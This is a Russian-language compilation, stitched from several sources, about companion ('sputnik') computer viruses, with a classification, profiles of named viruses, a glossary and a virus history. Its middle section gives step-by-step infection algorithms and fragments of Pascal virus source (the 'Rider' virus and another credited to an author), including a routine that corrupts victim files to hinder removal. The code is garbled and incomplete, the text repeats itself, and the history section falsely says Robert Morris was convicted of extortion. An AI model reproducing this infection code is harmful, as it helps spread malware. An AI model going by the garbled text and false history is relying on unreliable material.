Вирусы спутники вирусы компаньоны
Компьютерные вирусы — разновидность вредоносных программ, отличительной особенностью которых является способность к размножению (саморепликации). В дополнение к этому они могут повреждать или полностью уничтожать данные, созданные пользователем, от имени которого была запущена заражённая программа.
К компьютерным вирусам неспециалисты иногда причисляют все вредоносные программы, такие как троянские кони, программы-шпионы. Условимся называть вирусами саморазмножающиеся программы, паразитирующие на исполняемых файлах, динамических библиотеках, драйверах и других объектах подобного рода. Вирусы распространялись, внедряя себя в исполняемый код других программ, или же заменяя собой другие программы. Из-за внедрения исполняемого кода — например, макросов — в документы, появились макровирусы, поражающие такие документы (например Microsoft Word и Excel).
Классификация вирусов.
В настоящее время не существует единой системы классификации и именования вирусов (хотя попытка создать стандарт была предпринята в 1991 году). Принято разделять вирусы по поражаемым объектам (файловые вирусы, загрузочные вирусы, скриптовые вирусы, сетевые черви), по поражаемым операционным системам и платформам (DOS, Microsoft Windows, Unix, GNU/Linux, Java и другие), по технологиям используемым вирусом (полиморфные вирусы, стелс-вирусы), по языку на котором написан вирус (ассемблер, высокоуровневый язык программирования, скриптовый язык и др.).
Классификация файловых вирусов по способу заражения.
По способу заражения файловые вирусы (вирусы, внедряющие свой код в исполняемые файлы: командные файлы, программы, драйверы, исходный код программ и др.)разделяют на:
- перезаписывающие
- паразитические
- вирусы-звенья
- вирусы-черви
- компаньон-вирусы
- а так же вирусы, поражающие исходные тексты программ и
- компоненты программного обеспечения (VCL, LIB и др.).
Вирусы данного типа записывают свое тело вместо кода программы, не изменяя названия исполняемого файла, вследствие чего исходная программа перестает запускаться. При запуске программы выполняется код вируса, а не сама программа.
Вирусы-компаньоны.
Компаньон-вирусы, как и перезаписывающие вирусы, создают свою копию на месте заражаемой программы, но в отличие от перезаписываемых не уничтожают оригинальный файл, а переименовывают или перемещают его. При запуске программы вначале выполняется код вируса, а затем управление передается оригинальной программе.
Возможно существование и других типов вирусов-компаньонов, использующих иные оригинальные идеи или особенности других операционных систем. Например, PATH-компаньоны, которые размещают свои копии в основном каталоге Windows, используя тот факт, что этот каталог является первым в списке PATH, и файлы для запуска Windows в первую очередь будет искать именно в нем. Данными способом самозапуска пользуются также многие компьютерные черви и троянские программы.
Файловые черви.
Файловые черви создают собственные копии с привлекательными для пользователя названиями (например Game.exe, install.exe и др.) в надежде на то, что пользователь их запустит.
Вирусы-звенья.
Как и компаньон-вирусы, не изменяют код программы, а заставляют операционную систему выполнить собственный код, изменяя адрес местоположения на диске зараженной программы, на собственный адрес. После выполнения кода вируса управление обычно передается вызываемой пользователем программе.
Паразитические вирусы.
Паразитические вирусы — это файловые вирусы изменяющие содержимое файла добавляя в него свой код. При этом зараженная программа сохраняет полную или частичную работоспособность. Код может внедряться в начало, середину или конец программы. Код вируса выполняется перед-, после- или вместе с программой, в зависимости от места внедрения вируса в программу.
Вирусы, поражающие исходный код программ.
Вирусы данного типа поражают или исходный код программы, либо её компоненты (OBJ-, LIB-, DCU- файлы) а так же VCL и ActiveX компоненты. После компиляции программы оказываются в неё встроенными. В настоящее время широкого распространения не получили.
Канал распространения вирусов.
Сейчас основной канал распространения вирусов — электронная почта. Так же распространена рассылка ссылок на якобы фото, музыку либо программы, в действительности являющиеся вирусами, по ICQ и другим IM, и по электронной почте.
Возможно так же заражение через странички интернет. В этом случае используются уязвимости ПО установленного на компьютере пользователя, либо уязвимости в ПО владельца сайта (это опаснее всего, так как заражению подвергаются добропорядочные сайты с большим потоком посетителей). Хакеры и спамеры используют зараженные компьютеры пользователей для рассылки спама или DDoS-атак.
Экономика вирусописателей.
Некоторые производители антивирусов утверждают, что сейчас создание вирусов превратилось из одиночного хулиганского занятия в серьёзный бизнес имеющий тесные связи с бизнесом спама и другими видами противозаконной деятельности. Также называются миллионные и даже миллиардные суммы ущерба от действий вирусов и червей. К подобным утверждениям и оценкам следует относиться предельно скептически, так, например, суммы ущерба по оценкам различных аналитиков различаются (иногда на три-четыре порядка), а методики подсчёта не приводятся.
Вирусы-компаньоны – это вирусы относящие к файловым, резидентным и вирусам прямого действия.
Чтобы выполнить свои разрушительные действия, вирусы-компаньоны могут ждать в памяти до тех пор, пока нужная программа не запустится (резидентный вирус), или действовать немедленно, копируя себя (вирусы прямого действия).
Примеры: Stator , Asimov.1539 , Terrax.1069.
– Он посылает сообщения электронной почтой, содержащие конфиденциальные данные на зараженном компьютере.
Краткое описание:
Stator – это червь, который влияет на файлы с EXE расширением.
Stator рассылает конфиденциальные данные на зараженном компьютере по электронной почте: пароли, имена пользователей, системы информации и т.д.
Stator попадает в компьютеры в сообщении электронной почты с файлами .JPG .PIF .
– Он осуществляет повреждения действия на пораженных компьютерах.
Краткое описание:
Asimov.1539 является вирусом, который распространяется на другие компьютеры путем копирования своего кода в другие файлы или программы.
Asimov.1539 не распространяется автоматически с помощью собственных средств. Необходимо вмешательство атакующих пользователей с целью достижения цели на зараженном компьютере. Для заражения используют дискеты, компакт-диски, электронные письма с прикрепленными файлами, интернет-загрузки, FTP , IRC- каналы, равный-равному ( P2P ) сетей обмена файлами, и т.д.
Asimov.1539 использует следующие стратегии инфекции:
• Резидент: как только она была запущена, вирус резидентный идет и останавливает функции, принадлежащие операционной системе. Поэтому, каждый раз, когда операционная система или приложение пытается получить доступ к любой из этих функций, вирус активизируется и заражает новые файлы.
• Компаньон: он переименовывает файлы на зараженном компьютере. Этот вирус также создает свои копии, и присваивает им оригинальные имена файлов. Когда пользователи пытаются открыть исходный файл, он на самом деле запустит копию вируса.
• Полиморфные: он шифрует себя. Для того, чтобы сделать это, он использует разные ключи и операции. В результате вирус имеет различные характеристики в каждой новой инфекции, что делает его трудным для антивирусных программ на обнаружение.
– Он осуществляет повреждения действия на пораженном компьютере. – Он захватывает определенную информацию введенную или сохраненную пользователем. Это приводит к потере информации, хранящейся на компьютере, а также влияет на производительность компьютера, сети, к которой он подключен.
– Снижают уровень безопасности компьютера.
Краткое описание:
Terrax.1069 является вирусом, который распространяется на другие компьютеры путем копирования своего кода в другие файлы или программы.
Terrax.1069 предотвращает доступ из программ на веб-сайты нескольких компаний, связанных с безопасностью (антивирусные программы, брандмауэры и т.д.).
Terrax.1069 перенаправляет на ложные сайты, пытается получить доступ к веб-страницам некоторых банков, с целью записи информации, введенной пользователем на этих страницах.
Terrax.1069 не распространяется автоматически с помощью собственных средств. Необходимо вмешательство атакующих пользователей с целью достижения цели на зараженном компьютере. Для заражения используют дискеты, компакт-диски, электронные письма с прикрепленными файлами, интернет-загрузки, FTP , IRC- каналы, равный-равному ( P2P ) сетей обмена файлами, и т.д.
Terrax.1069 использует следующие стратегии инфекции:
• Резидент: как только она была запущена, вирус резидентный идет и останавливает функции, принадлежащие операционной системе. Поэтому каждый раз, когда операционная система или приложение пытается получить доступ к любой из этих функций, вирус активизируется и заражает новые файлы.
• Компаньон: он переименовывает файлы на зараженном компьютере. Этот вирус также создает свои копии, и присваивает им оригинальные имена файлов. Когда пользователи пытаются открыть исходный файл, он на самом деле запустит копию вируса.
Вирусы-спутники сейчас широко распространены – соотношение companion и parasitic вирусов примерно один к двум.
Инфицирование методом создания COM-файла спутника
Заражение производится с помощью командного процессора:
1. Если в командной строке указаны параметры, сохранить их в переменную типа String для передачи инфицированной программе.
2. Найти EXE-файл-жертву.
3. Проверить, не присутствует ли в каталоге с найденным EXE-файлом COM-файл с таким же именем, как у файла-жертвы.
4. Если такой COM-файл присутствует, файл уже заражен, переходим к пункту 6.
5. С помощью командного процессора скопировать файл, из которого получено управление, в файл с именем жертвы и расширением COM.
6. Процедурой Exec загрузить и выполнить файл с именем стартового, но с расширением EXE – то есть выполнить инфицированную программу.
7. Вернуть управление в DOS.
Приведенный ниже листинг показывает заражение файлов этим методом.
подключается к каждой программе при компиляции)>
Author=’Dirty Nazi/SGWW. 4 PVT only!’;
и False, если еще нет>
function VirusPresent: Boolean;
но с расширением COM>
программа уже инфицирована этим вирусом>
If IOResult=0 Then
If Not VirusPresent Then
копируем вирусный код в COM?файл>
Exec(GetEnv(’COMSPEC’),’/C COPY /B ’+ParamStr(0)+’
с атрибутами Archive>
FindFirst(’*.EXE’, Archive, Sr);
While DosError=0 Do
If Sr.Name=’’ Then Exit;
If InfFiles > InfCount Then Exit;
If ParamCount <> 0 Then
For I:=1 To ParamCount Do
FindFirst(TargetFile, AnyFile, DirInfo);
If DosError=0 Then
не внося в программу изменений>
WriteLn(#13#10, VirName, ’ by ’,Author);
Инфицирование методом переименования EXE-файла
1. Если в командной строке указаны параметры, сохранить их в переменную типа String для передачи инфицированной программе.
2. Найти EXE-файл-жертву.
3. Проверить, не присутствует ли в каталоге с найденным EXE-файлом-жертвой файл с таким же именем и с расширением, которое выбрано для инфицированной программы (например, OVL – программный оверлей).
4. Если такой файл присутствует, программа уже инфицирована – переходим к пункту 7.
5. Переименовать найденный файл-жертву (EXE) в файл с таким же именем, но с расширением, выбранным для инфицированной программы.
6. С помощью командного процессора скопировать файл, из которого получено управление, в файл с именем жертвы и расширением жертвы.
7. Найти в каталоге, из которого получено управление, файл с именем стартовой программы, но с расширением, выбранным для инфицированной – это и будет зараженная программа, которую в данный момент необходимо запустить на исполнение.
8. Если такой файл не найден, переходим к пункту 12.
9. Изменить расширение найденного файла на COM (ни в коем случае не на EXE, ведь в EXE-файле с таким именем находится вирусный код!).
10. Процедурой Exec загрузить и выполнить переименованный файл – то есть выполнить инфицированную программу.
11. Вернуть COM-файлу с инфицированной программой выбранное расширение, то есть превратить его опять в неисполняемый.
12. Вернуть управление в DOS.
Несколько слов о вирусе, листинг которого приведен ниже. Вирус Rider написан очень просто и доступно. За сеанс работы он заражает один EXE-файл в текущем каталоге. Сам процесс заражения также весьма прост: файл-жертва переписывается в файл с расширением OVL (оверлейный файл), а на его место с помощью командного процессора копируется вирусный код. При запуске происходит заражение только что найденного EXE-файла, затем вирусный код переименовывается в OWL, а OVL – в EXE, после чего оригинал запускается на исполнение. Когда оригинал отработал, происходит переименование в обратном порядке. С защищенного от записи диска программа не запустится, она выдаст сообщение, что диск защищен от записи.
В представленном здесь виде вирус легко обезвредить, достаточно просто переименовать OVL-файл обратно в EXE. Но, чтобы усложнить лечение, в вирусе может быть использован такой прием:
Buf10: Array [1.10] of Byte;
BlockRead(Prog, Buf10, 10);
For Cicle:=1 To 10 Do Buf10[Cicle]:=Not Buf10[Cicle];
BlockWrite(Prog, Buf10, 10);
При использовании этой процедуры надо учитывать, что заражаемая и запускаемая на исполнение программа должна быть связана с переменной Prog типа File, описанной в основном модуле. Суть процедуры состоит в том, что из заражаемой программы считываются 10 байт и кодируются операцией Not. EXE-программа становится неработоспособной. Запускать эту процедуру нужно не только перед прогоном оригинала, но и после него.
High Heap Limit 0b >
подключается к каждой программе при компиляции)>
Fail=’Cannot execute ’#13#10’Disk is write?protected’;
- 7 Янв 2018
- 202
- 264
- 0
Анти—антивирусный вирус (Anti-antivirus Virus, Retrovirus) — компьютерная вирусная программа, объектом нападения которой являются антивирусные программы.
Антивирусный вирус (Anti-virus Virus) — компьютерная вирусная программа, объектом нападения которой являются другие компьютерные вирусы.
Антивирусная программа (Anti-virus program) — программа поиска, диагностики, профилактики и лечения файлов, зараженных компьютерным вирусом. В процессе поиска и диагностики определяются зараженные файлы и тип вируса. Профилактика позволяет предотвращать заражение. Лечение подразумевает удаление вируса и восстановление поврежденных файлов.
Антивирусный сканер (Anti-virus scanner) — программа, способная обнаруживать программный код вирусов (сигнатуру) в зараженных ими файлах при помощи базы данных о вирусах, известных такой антивирусной программе или исходя из априорных предпосылок об устройстве такого кода. Сканеры периодически, например, по запросу пользователя, проверяют определенные объекты (диски, каталоги или файлы, а также оперативную память и загрузочные секторы) на наличие программного кода.
Апплет (Applet) — Класс языка Java, встроенный в виде исполняемого модуля в документ, созданный на языке HTML. Апплет загружается с сервера на компьютер пользователя как прикрепленный файл. Апплеты применяют, например, при организации на Web-страницах интерактивного диалога с пользователем.
Архивный файл (Archive file) — файл, являющийся результатом сжатия архиватора.
База данных антивирусной программы, вирусная база (Anti-virus program virus database)— содержит информацию о фрагментах кода (сигнатурах) известных данной антивирусной программе вирусов, а также необходимые сведения для восстановления (излечения) пораженных этими вирусами объектов. Для современных компьютерных вирусов характерна огромная скорость распространения. В течение нескольких дней, а иногда и часов, вновь появившийся вирус может заразить миллионы компьютеров по всему миру. Разработчики антивирусного комплекса непрерывно пополняют вирусные базы новыми вирусными записями (сигнатурами). После установки таких дополнений антивирусный комплекс делается способным обнаруживать новые вирусы, блокировать их распространение, а в ряде случаев - излечивать зараженные файлы.
BIOS-кит (BIOS-kit) — вредоносная программа, способная заражать BIOS компьютера.
Бомба с часовым механизмом (Time bomb) — частный случай логических бомб, в которых срабатывание скрытого модуля определяется временем.
Ботнет (Botnet) — сеть компьютеров, зараженных троянцами-ботами. Ботнет используется для рассылки спама или проведения сетевых атак, например подбора паролей или DоS-атак.
Буткиты (Boot viruses) — вредоносные программы, которые заражают загрузочные записи (Boot record) дискет, разделов жестких дисков, а также модифицируют главный загрузочный сектор MBR (Master Boot Record).
Брешь, ошибка в программе (bug) — любая непреднамеренная программная ошибка, как синтаксическая, так и семантическая.
Бэкдоры (Backdoors) — программы, предназначенные для удаленного управления зараженной системой. Часто используются для обхода существующей системы безопасности.
Вариант вируса, штамм, модификация (Variant) — модифицированный вариант одного и того же вируса. Изменения в вирусный код могут вноситься как автором вируса, так и третьим лицом.
Вирус (Virus) — программа, инфицирующая файловые объекты и способная к самовоспроизведению.
Вирусная программа-червь (Worm-virus) — паразитическая программа, обладающая механизмом саморазмножения, но не заражающая другие исполняемые файлы. Проникая в систему, распространяет свои копии на другие компьютеры, объединенные в ту же сеть, что и инфицированный ПК.
Вирусный код, сигнатура (Signature) — система символов и однозначных правил их интерпретации, используемая для предоставления информации в виде данных. Представляет собой набор символов или последовательность байтов, которые, как предполагается, могут быть свойственны, а, следовательно, и обнаружены в каком-то определенном вирусе, в каждой его копии, и только в нем. Антивирусные сканеры используют сигнатуру для нахождения вирусов. Пoлиморфные вирусы не имеют сигнатуры.
Вирусный мистификатор (Hoax) — почтовые сообщения, написанные в нейтральном тоне, которые не являются вредоносными. В них указывается, например, о якобы распространяющемся новом вирусе. Большинство вирусных мистификаций обладают одной или несколькими характеристиками:
Вирусы-спутники, вирусы-компаньоны (Virus-companion) — формально являются файловыми вирусами. Не внедряются в исполняемые программы. Такие вирусы используют особенность системы DOS, позволяющую программному файлу с тем же названием, но другим расширением действовать с разными приоритетами. Под приоритетом понимают присваиваемый задаче, программе или операции признак, определяющий очередность их выполнения вычислительной системой. Большинство таких вирусов создают .COM файл, который обладает более высоким приоритетом, нежели .EXE файлы с тем же самым названием. При запуске файла по имени (без указания расширения) будет запущен файл с расширением .СОМ.
Такие вирусы могут быть резидентными и маскировать файлы-двойники.
Вредоносные действия вирусов (Damage). На компьютере пользователя вирусы могут производить следующие вредоносные действия.
- Вызывать отказ в выполнении той или иной функции в работе системы, инициировать ошибки и сбои, вызывать зависание системы сразу после ее загрузки.
- Выполнять действия, не предусмотренные программой.
- Разрушать файлы, диски (форматировать диски, удалять файлы).
- Выдавать на экран дисплея раздражающие пользователя ложные сообщения.
- Создавать звуковые или визуальные эффекты (падающие буквы, проигрывание мелодии и т.д.).
- Блокировать доступ к системным ресурсам (разрастание зараженных файлов за счет их многократного повторного заражения, замедление работы компьютера и т.д.).
- Имитировать сбои аппаратуры (перевод части кластеров в "псевдосбойные").
Следует отметить, что наиболее опасны не катастрофические повреждения винчестера или дискет, а мелкие, незаметные изменения файлов данных.
- 7 Янв 2018
- 202
- 264
- 0
Дата и время добавления в вирусную базу — дата и время выпуска дополнения к текущей вирусной базе, в котором дано определение соответствующего вируса и способы борьбы с ним (удаление, лечение и т.д.). С момента включения определения вируса в вирусную базу антивирусная программа в состоянии правильно обнаруживать вирус и, соответственно, обезвреживать его.
Демон (Daemon) — программа, используемая для выполнения служебной функции без запроса со стороны пользователя и даже без его ведома.
Деструктивное действие вируса (Destructiveness) — стратегия его функционирования, предпринимаемые им, подчас незаметные для пользователя, вредоносные действия направленные на нарушение нормального функционирования операционной системы, а иногда ее полного краха, а также условия, при которых вирус вступает в фазу своего проявления и его алгоритм работы в ней.
"Дикая природа" ("Wild") — компьютерная среда. Выражение "вирус "в дикой природе" означает, что такой вирус вызвал инфицирование компьютеров или сайтов вне стен антивирусной лаборатории. Список "диких вирусов" составленный специалистом по вирусам Joe Wells содержит перечень наиболее часто встречающихся вирусов в компьютерах во всем мире.
Длина файлового вируса (File virus size) — длина в байтах кода вируса, имеющегося в каждом зараженном файле.
Длина головы и хвоста бутового вируса (Boot virus size) — длиной головы бутового вируса называют длину тела вируса, помещаемого в загрузочный сектор дискеты или MBR. Длиной хвоста называют длину тела вируса, размещаемого на свободном пространстве дискеты или винчестера (такие сектора помечаются как сбойные).
DNS-заражение (DNS poisoning) — атака на кеш DNS-сервера. В результате в кеше появляется ложная запись о соответствии DNS-имени хоста, которому жертва доверяет, и IP-адреса, указанного атакующим. Является подвидом спуфинга. Атака может поражать как клиентский хост, так и хост сервера, что может привести к массовому перенаправлению пользователей на ложный адрес.
Дозвонщики (Dialers) — программы, используемые злоумышленниками для накручивания оплаты за телефон жертве или для незаметного подключения пользователя через модем к дорогостоящим платным телефонным службам.
DoS-атаки (DoS-attacks) — популярный среди злоумышленников вид сетевых атак, граничащий с терроризмом. Заключается в отправке запросов с компьютеров на атакуемый сервер с целью выведения его из строя. При достижении определенного количества запросов (ограниченного аппаратными возможностями сервера) сервер перестает справляться с нагрузкой, что приводит к отказу в обслуживании. Данной атаке часто предшествует спуфинг. DoS-атаки стали широко используемым средством запугивания и шантажа конкурентов.
"Дроппер" (Dropper) — файл-носитель, устанавливающий вирус в систему. Техника иногда используемая вирусописателями для "прикрытия" вирусов от антивирусных программ.
Другие названия вируса (Other virus names)— антивирусные компании, как правило, дают разные названия одним и тем же вирусам, исходя из собственных правил формирования вирусного имени. В большинстве случаев основное имя вируса (например, Klez, Badtrans, Nimda) одинаково и присутствует в наименовании этого вируса, независимо от антивирусной компании. Различаются в основном префиксы и суффиксы имени вируса, правила использования которых у каждой компании могут быть свои. В частности, если в классификации вирусов, принятой в компании "Доктор Веб", версии одного и того же вируса нумеруются числами, начиная с 1, в компании Symantec для этих же целей используются заглавные буквы английского алфавита.
Заплатка (Patch)— последовательность команд, добавленных к коду готовой программы ее производителем для исправления имеющихся недостатков. Такая последовательность команд вносится в виде отдельного блока или файла, в нужном месте команды помещается строка перехода. Иногда заплата является средством добавления новой функции к существующей версии программы до выхода ее новой версии, где эта функция будет вставлена обычным путем.
Зоологический вирус (Zoo virus) — вирус, существующий только в антивирусных лабораториях, в коллекциях исследователей вирусов и не встречается в "дикой природе".
Kлюч реестра (Registry key) — запись в реестре, уникальный идентификатор, присваиваемый определенной части информации, хранящейся в реестре.
Компьютерные вирусы (Computer viruses) — это программы или фрагменты программного кода, которые, попав на компьютер, могут вопреки воле пользователя выполнять различные операции на этом компьютере — создавать или удалять объекты, модифицировать файлы данных или программные файлы, осуществлять действия по собственному распространению по локальным вычислительным сетям или по сети Интернет. Модификация программных файлов, файлов данных или загрузочных секторов дисков таким образом, что последние сами становятся носителями вирусного кода и в свою очередь могут осуществлять вышеперечисленные операции, называется заражением (инфицированием) и является важнейшей функцией компьютерных вирусов. В зависимости от типов заражаемых объектов выделяются различные типы вирусов.
Логические бомбы (Logic bomb) — скрытые модули, встроенные в ранее разработанную и широко используемую программу. Такой модуль является безвредным до определенного события, при наступлении которого он срабатывает (например, нажатие пользователем определенных кнопок клавиатуры, или наступление определенной даты или времени).
Люки (Back-door) — программы, обеспечивающие вход в систему или получение привилегированной функции (режима работы) в обход существующей системы полномочий. Часто используются для обхода существующей системы безопасности. Люки не инфицируют файлы, но прописывают себя в реестр, модифицируя таким образом ключи реестра.
Макрокомандные вирусы (Macroviruses) — вредоносные программы, которые заражают файлы, созданные приложениями Microsoft Office и другими программами, допускающими наличие макрокоманд.
MtE вирусы (MtE viruses) — полиморфные вирусы, созданные с помощью генератора полиморфизма MtE (Mutant Engine). Такой генератор представляет собой специальный алгоритм, который отвечает за функции шифровки/расшифровки и генерацию расшифровщиков и присоединяется к любому объектному коду вируса. Такой расшифровщик не имеет ни одного постоянного бита, длина его всегда разная.
Операционная система, ОС (Operating System, OS) — комплекс программ, организующих вычислительный процесс в вычислительной системе.
Основными функциями ОС являются распределение ресурсов вычислительной системы между задачами с целью их наиболее эффективного использования. Пользователь управляет ОС с помощью команд операционной системы.
Для управления работой персональных компьютеров применяются MS-DOS, Windows, OS/2 или Unix различных версий и конфигураций.
Комьютерные вирусы являются высокоспециализированными программами и сильно зависят от среды своего функционирования. Используемая операционная система является наиболее важной характеристикой среды распространения вируса.
Содержание
Вредоносное программное обеспечение
К вредоносному программному обеспечению относятся сетевые черви, компьютерные вирусы, троянские программы, хакерские утилиты и прочие программы, наносящие какой-либо вред компьютеру, на котором они запускаются, или другим компьютерам в сети.
Компьютерные вирусы - это вредоносные программы, которые мешают нормальной работе компьютера, перезаписывают, повреждают или удаляют данные.
Они также распространяются между компьютерами в сети и через Интернет, часто замедляя их работу и вызывая другие неполадки.
Неспециалисты иногда к компьютерным вирусам причисляют все вредоносные программы, такие как троянские кони, программы-шпионы.
Подобно действию вирусов, поражающих человека (от обычного гриппа до вируса Эбола), воздействие компьютерных вирусов также может быть различным: от раздражающего до разрушительного.
Кроме того, постоянно появляются новые разновидности, не похожие на предыдущие.
Открыв и запустив зараженную программу или вложение, вы можете даже не подозревать о наличии вируса, пока не появятся проблемы в работе.
Вот несколько основных признаков того, что компьютер может быть заражен вирусом:
- компьютер работает медленнее, чем обычно;
- компьютер перестает отвечать на запросы и часто блокируется;
- каждые несколько минут происходит отказ системы и перезагрузка;
- компьютер самопроизвольно перезагружается и работает со сбоями;
- приложения работают некорректно;
- диски или дисководы недоступны;
- печать выполняется с ошибками;
- появляются необычные сообщения об ошибках;
- открываются искаженные меню и диалоговые окна.
Все это типичные признаки заражения. Однако они характерны и для неполадок программного обеспечения или оборудования, не имеющих ничего общего с вирусами.
Поэтому, если на компьютере не установлены современные качественные антивирусные программы, нельзя точно определить, заражен ли компьютер вирусами.
В настоящее время не существует единой системы классификации и именования вирусов.
Принято разделять вирусы:
- по поражаемым объектам (файловые вирусы, загрузочные вирусы, скриптовые вирусы, сетевые черви);
- по поражаемым операционным системам и платформам (DOS, Microsoft Windows, Unix, GNU/Linux, Java и другие);
- по технологиям используемым вирусом (полиморфные вирусы, стелс вирусы);
- по языку на котором написан вирус (ассемблер, высокоуровневый язык программирования, скриптовый язык и другое).
По способу заражения файловые вирусы (вирусы, внедряющие свой код в исполняемые файлы: командные файлы, программы, драйверы, исходный код программ и другое) разделяют на:
- перезаписывающие;
- паразитические;
- вирусы-звенья;
- вирусы-черви;
- компаньон-вирусы;
- вирусы, поражающие исходные тексты программ и компоненты программного обеспечения (VCL, LIB и другое).
Перезаписывающие вирусы
Вирусы данного типа записывают свое тело вместо кода программы, не изменяя названия исполняемого файла, вследствие чего исходная программа перестает запускаться. При запуске программы выполняется код вируса, а не сама программа.
Вирусы-компаньоны
Компаньон-вирусы, как и перезаписывающие вирусы, создают свою копию на месте заражаемой программы, но в отличие от перезаписываемых не уничтожают оригинальный файл, а переименовывают или перемещают его.
При запуске программы вначале выполняется код вируса, а затем управление передается оригинальной программе.
Возможно существование и других типов вирусов-компаньонов, использующих иные оригинальные идеи или особенности других операционных систем.
Например, PATH компаньоны, которые размещают свои копии в основном каталоге Windows, используя тот факт, что этот каталог является первым в списке PATH, и файлы для запуска Windows в первую очередь будет искать именно в нем.
Данными способом самостоятельного запуска пользуются также многие компьютерные черви и троянские программы.
Файловые черви
Файловые черви создают собственные копии с привлекательными для пользователя названиями (например Game.exe, install.exe и другое) в надежде на то, что пользователь их запустит.
Вирусы-звенья
Как и компаньон-вирусы, не изменяют код программы, а заставляют операционную систему выполнить собственный код, изменяя адрес местоположения на диске зараженной программы, на собственный адрес. После выполнения кода вируса управление обычно передается вызываемой пользователем программе.
Паразитические вирусы
Паразитические вирусы - это файловые вирусы изменяющие содержимое файла добавляя в него свой код. При этом зараженная программа сохраняет полную или частичную работоспособность. Код может внедряться в начало, середину или конец программы. Код вируса выполняется перед, после или вместе с программой, в зависимости от места внедрения вируса в программу.
Вирусы, поражающие исходный код программ
Вирусы данного типа поражают или исходный код программы, либо ее компоненты (OBJ-, LIB-, DCU- файлы) а так же VCL и ActiveX компоненты. После компиляции программы оказываются в нее встроенными. В настоящее время широкого распространения не получили.
Каналы распространения вирусов
Сейчас основной канал распространения вирусов - электронная почта.
Так же распространена рассылка ссылок на якобы фото, музыку либо программы, в действительности являющиеся вирусами, по ICQ и другим IM, и по электронной почте.
Возможно так же заражение через странички интернет. В этом случае используются уязвимости программного обеспечения установленного на компьютере пользователя, либо уязвимости в программном обеспечении владельца сайта (это опаснее всего, так как заражению подвергаются добропорядочные сайты с большим потоком посетителей).
Хакеры и спамеры используют зараженные компьютеры пользователей для рассылки спама или DDoS атак (целью этих атак является создание таких условий, при которых правомерные пользователи системы не могут получить доступ к предоставляемым системой ресурсам, либо этот доступ затруднен).
Появление первых вирусов
С появлением первых персональных компьютеров Apple в 1977 году и развитием сетевой инфраструктуры начинается новая эпоха истории вирусов.
Появились первые программы-вандалы, которые под видом полезных программ после запуска уничтожали данные пользователей.
В это же время появляются троянские программы-вандалы, проявляющие свою деструктивную сущность лишь через время или при определенных условиях.
Очередным этапом развития вирусов считается 1987 год.
К этому моменту получили широкое распространения сравнительно дешевые компьютеры IBM PC, что привело к резкому увеличению масштаба заражения компьютерными вирусами.
Именно в 1987 вспыхнули сразу три крупные эпидемии компьютерных вирусов.
Первая эпидемия 1987 была вызвана вирусом Brain (также известен как Пакистанский вирус), который был разработан братьями Амджатом и Базитом Алви.
По данным McAfee, вирус заразил только в США более 18 тысяч компьютеров.
Программа должна была наказать местных пиратов, ворующих программное обеспечение у их фирмы. В программке значились имена, адрес и телефоны братьев.
Однако неожиданно для всех The Brain вышел за границы Пакистана и заразил сотни компьютеров по всему миру.
Вторая эпидемия, берущая начало в Лехайском университете (США), разразилась в ноябре 1987.
В течение нескольких дней этот вирус уничтожил содержимое нескольких сот дискет из библиотеки вычислительного центра университета и личных дискет студентов. За время эпидемии вирусом было заражено около четырех тысяч компьютеров.
Последняя вирусная эпидемия разразилась перед самым Новым годом, 30 декабря 1987. Ее вызвал вирус, обнаруженный в Иерусалимском Университете (Израиль).
Хотя существенного вреда этот вирус не принес, он быстро распространился по всему миру.
Это, пожалуй, один из первых MS-DOS-вирусов, ставший причиной настоящей пандемии - сообщения о зараженных компьютерах поступали из Европы, Америки и Ближнего Востока.
В 1988 Робертом Моррисом-младшим был создан первый массовый сетевой червь - Червь Морриса.
Вирус изначально разрабатывался как безвредный и имел целью лишь скрытно проникнуть в вычислительные системы, связанные сетью ARPANET и остаться там необнаруженным.
Вирусная программа включала компоненты, позволяющие раскрывать пароли, существующие в инфицируемой системе, что, в свою очередь, позволяло программе маскироваться под задачу легальных пользователей системы, на самом деле занимаясь размножением и рассылкой копий.
Вирус не остался скрытым и полностью безопасным, как задумывал автор, в силу незначительных ошибок, допущенных при разработке, которые привели к стремительному неуправляемому саморазмножению вируса.
Червь Морриса поразил свыше 6200 компьютеров. В результате вирусной атаки большинство сетей вышло из строя на срок до пяти суток.
Автор программы был арестован в момент обналичивания чека и осужден за вымогательство.
Также был создан первый вирус, противодействующий антивирусному программному обеспечению - The Dark Avenger. Он заражал новые файлы, пока антивирусная программа проверяла жесткий диск компьютера.
Другие вредоносные программы
Троянская программа - программа, осуществляющая различные несанкционированные пользователем действия: сбор информации и ее передачу злоумышленнику, ее разрушение или злонамеренную модификацию, нарушение работоспособности компьютера, использование ресурсов компьютера в неблаговидных целях.
Отдельные категории троянских программ наносят ущерб удаленным компьютерам и сетям, не нарушая работоспособность зараженного компьютера.
Они также могут распространяться в качестве вложений в сообщения электронной почты и мгновенные сообщения, замаскированные под забавные картинки, поздравительные открытки, аудио- и видеофайлы.
Иногда такие программы проникают на компьютер без участия пользователя, благодаря уязвимостям в программном обеспечении или Интернете.
Злоумышленники могут использовать эту возможность в следующих целях:
Они могут показывать рекламные сообщения, объявления или собирать личные данные.
Дополнительная информация по теме
Статья о зомби компьютерах, которыми управляют третьи лица без согласия самих пользователей, как этого избежать
Читайте также: